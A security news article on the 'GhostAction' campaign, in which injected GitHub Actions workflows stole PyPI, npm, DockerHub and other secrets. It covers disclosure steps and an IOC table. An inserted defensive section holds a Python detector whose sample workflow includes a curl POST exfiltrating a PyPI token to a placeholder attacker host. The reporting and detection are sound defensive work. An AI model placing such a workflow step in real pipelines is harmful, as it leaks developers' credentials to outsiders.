Security researchers at GitGuardian have uncovered a sophisticated supply chain attack dubbed “GhostAction” that compromised 327 GitHub users across 817 repositories, successfully stealing 3,325 sensitive developer secrets.
The attack, discovered on September 5, 2025, represents one of the largest documented cases of malicious GitHub workflow injection targeting critical development infrastructure.
The campaign primarily targeted authentication tokens for popular development platforms including PyPI, npm, and DockerHub, creating significant risks for the software supply chain.
Attackers systematically injected malicious GitHub Actions workflows that silently exfiltrated credentials via HTTP POST requests to a remote server, demonstrating a sophisticated understanding of modern CI/CD security vulnerabilities.
CI/CD Infrastructure Under Sophisticated Attack
The GhostAction campaign began with the compromise of the FastUUID project, where attackers pushed a seemingly innocuous commit titled “Add Github Actions Security workflow” on September 2, 2025.
The malicious workflow was designed to automatically trigger on any code push or manual dispatch, immediately stealing PyPI API tokens from the repository’s secrets.

The attack methodology showed careful reconnaissance, with threat actors first analyzing legitimate workflow files to identify available secrets before crafting targeted exfiltration code.
Each malicious workflow followed a consistent pattern: establishing cache-busting mechanisms and then using curl commands to transmit stolen credentials to the attacker-controlled endpoint at bold-dhawan.45-139-104-115.plesk.page.
Key elements of the malicious workflow included:
- Cache-busting environment variable to avoid duplicate requests.
- Stealthy curl-based HTTP POST for exfiltration.
- Use of security-themed names to disguise malicious intent.
What made this attack particularly dangerous was its stealth approach. The workflows appeared legitimate at first glance, using security-themed names that could easily be overlooked during routine code reviews.
The attackers demonstrated patience, waiting three days after the initial FastUUID compromise before expanding operations, suggesting this was part of a larger, coordinated campaign rather than opportunistic attacks.
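A defender-side check for the workflow shape described above, added here as an example that is not part of GitGuardian's report or tooling: it scans a workflow file for steps that read `${{ secrets.* }}` and run curl or wget against a host outside an assumed allowlist. The sample workflow is constructed for the example and uses a placeholder host, not the endpoint from the IOC table; the allowlist is an assumption to tune per organisation.

```python
import re
# Hosts a step may legitimately send a credential to; assumed allowlist, tune it per org.
ALLOWED_HOSTS = {"api.github.com", "upload.pypi.org", "registry.npmjs.org"}
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")

def split_steps(text):
    """Split the first `steps:` block into its entries by indentation (no PyYAML needed)."""
    m = re.search(r"^[ \t]*steps:[ \t]*\n(?:[ \t]*\n)*([ \t]+)- ", text, re.M)
    if not m:
        return []
    indent, kept = m.group(1), []
    for line in text[m.start(1):].splitlines():
        if line.strip() and len(line) - len(line.lstrip()) < len(indent):
            break                                   # dedent: we left the steps block
        kept.append(line)
    return re.split(r"\n(?=" + indent + r"- )", "\n".join(kept))

def scan_workflow(text):
    """Flag steps that read repository secrets and run curl/wget against a host
    outside the allowlist, the shape of the GhostAction exfiltration step."""
    findings = []
    for step in split_steps(text):
        secrets = set(SECRET_REF.findall(step))
        if not secrets or not re.search(r"\b(curl|wget)\b", step):
            continue                                # secrets used, but no ad-hoc HTTP client
        hosts = {h for h in URL_HOST.findall(step) if h not in ALLOWED_HOSTS}
        if hosts:
            name = re.search(r"name:\s*(.+)", step)
            findings.append({"step": name.group(1).strip() if name else "<unnamed>",
                             "secrets": sorted(secrets), "hosts": sorted(hosts)})
    return findings

# Constructed sample mirroring the pattern described above (placeholder host, not the real IOC).
SAMPLE_WORKFLOW = """\
name: Github Actions Security
jobs:
  check:
    steps:
      - name: Publish
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
      - name: Security check
        env:
          TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          CACHE_BUST: ${{ github.run_id }}
        run: |
          curl -s -X POST https://attacker.example/collect -d "token=$TOKEN&cb=$CACHE_BUST"
"""
```

Running `scan_workflow(SAMPLE_WORKFLOW)` reports only the "Security check" step; the "Publish" step uses the same secret through a known publishing action and is not flagged.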

Coordinated Campaign Uncovered
GitGuardian’s investigation revealed the true scope extended far beyond the initial FastUUID discovery.
Using their historical dataset of GitHub commits, researchers identified that the same compromised user pushed identical malicious commits to at least five other public repositories and an estimated ten private repositories on the same date.
The analysis uncovered 327 total victims across the campaign, with no overlap detected with the recent S1ngularity attack, indicating this was an entirely separate operation. The stolen credentials included a diverse range of high-value targets:
- DockerHub credentials.
- GitHub Personal Access Tokens.
- npm publishing tokens.
- AWS access keys and database credentials.
The attackers showed remarkable persistence and organization, customizing each malicious workflow to target specific secrets available in individual repositories.
Some workflows targeted cryptocurrency exchange APIs, cloud platform credentials, and database access keys, suggesting the threat actors had broad commercial interests beyond simple credential theft.
The campaign’s coordination across multiple repositories simultaneously indicates significant planning and resources behind the operation.
Swift Response Averts Damage
GitGuardian’s rapid response likely prevented catastrophic outcomes from the massive credential theft.
The research team immediately began creating alert issues across all 817 affected repositories, successfully notifying 573 projects where issues remained enabled. This disclosure strategy prompted immediate remediation efforts from affected developers.
The coordinated actions taken included:
- PyPI moved the FastUUID project to read-only status within hours.
- Compromised commit reverted by the maintainer on September 5 at 12:30 PM.
- Formal notifications sent to GitHub, npm, and PyPI security teams by 3:50 PM.
Despite the massive scale of credential theft, initial investigations found no evidence of malicious package releases during the compromise window.
However, GitGuardian identified 9 npm and 15 PyPI packages at immediate risk of compromise, requiring ongoing surveillance.
The attack’s discovery highlights critical vulnerabilities in GitHub Actions security and demonstrates the need for enhanced monitoring of CI/CD pipeline integrity across the software development ecosystem.
Indicators of Compromise (IOCs)
| Category | Indicator |
|---|---|
| Network Indicators | |
| Malicious Endpoint | hxxps://bold-dhawan.45-139-104-115.plesk.page |
| IP Address | 45.139.104.115 |
| HTTP Method | POST requests with secret data |
| GitHub Workflow Indicators | |
| Malicious Workflow Name | Github Actions Security |
| File Path | .github/workflows/github_actions_security.yml |
| Commit Messages | "Add Github Actions Security workflow" |